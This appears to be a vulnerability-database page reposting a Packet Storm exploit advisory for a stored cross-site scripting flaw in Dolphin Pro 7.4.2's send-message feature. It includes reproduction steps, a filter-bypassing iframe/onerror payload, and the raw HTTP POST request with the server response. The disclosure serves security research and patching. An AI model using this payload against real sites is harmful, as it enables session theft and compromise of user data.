Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Dolphin Pro 7.4.2 Cross Site Scripting

🗓️ 25 Mar 2025 00:00:00Reported by Andrey StoykovType 
packetstorm
 packetstorm🔗 packetstorm.news👁 206 Views

Stored XSS exploit in Dolphin Pro 7.4.2 via message functionality can compromise user data.

Code
# Exploit Title: Stored XSS via Send Message Functionality -
    dolphin.prov7.4.2
    # Date: 03/2025
    # Exploit Author: Andrey Stoykov
    # Version: 7.4.2
    # Date: 03/2025
    # Tested on: Debian 12
    # Blog:
    https://msecureltd.blogspot.com/2025/03/friday-fun-pentest-series-20-stored-xss.html
    
    
    
    Stored XSS via Send Message Functionality:
    
    Steps to Reproduce:
    
    1. Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
    2. Add "Recipient" and "Subject" with random words
    3. Add the below mentioned XSS payload that would bypass the XSS filter in
    the message section
    4. Intercept the HTTP POST request and add the payload once again, as it
    might get filtered (make sure to URL encode the spaces etc)
    5. It would trigger once the message has been seen
    
    <iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
    
    
    
    // HTTP POST request
    
    POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1
    HTTP/1.1
    Host: 192.168.58.170
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0)
    Gecko/20100101 Firefox/137.0
    [...]
    
    subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>
    
    
    // HTTP response
    
    HTTP/1.1 200 OK
    Date: Fri, 21 Mar 2025 17:41:52 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Content-Length: 455
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    <div class="MsgBox" id="1742578912167">
    <table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
    <div class="msgbox_content bx-def-font-large bx-def-padding-sec">
    Message has been successfully sent. <a href="
    http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another
    message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a>
    admin's profile.        </div>
    </td></tr></table>
    </div>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Mar 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
stored xssexploit titlesend message functionalityversion 7.4.2debian 12http post request.
206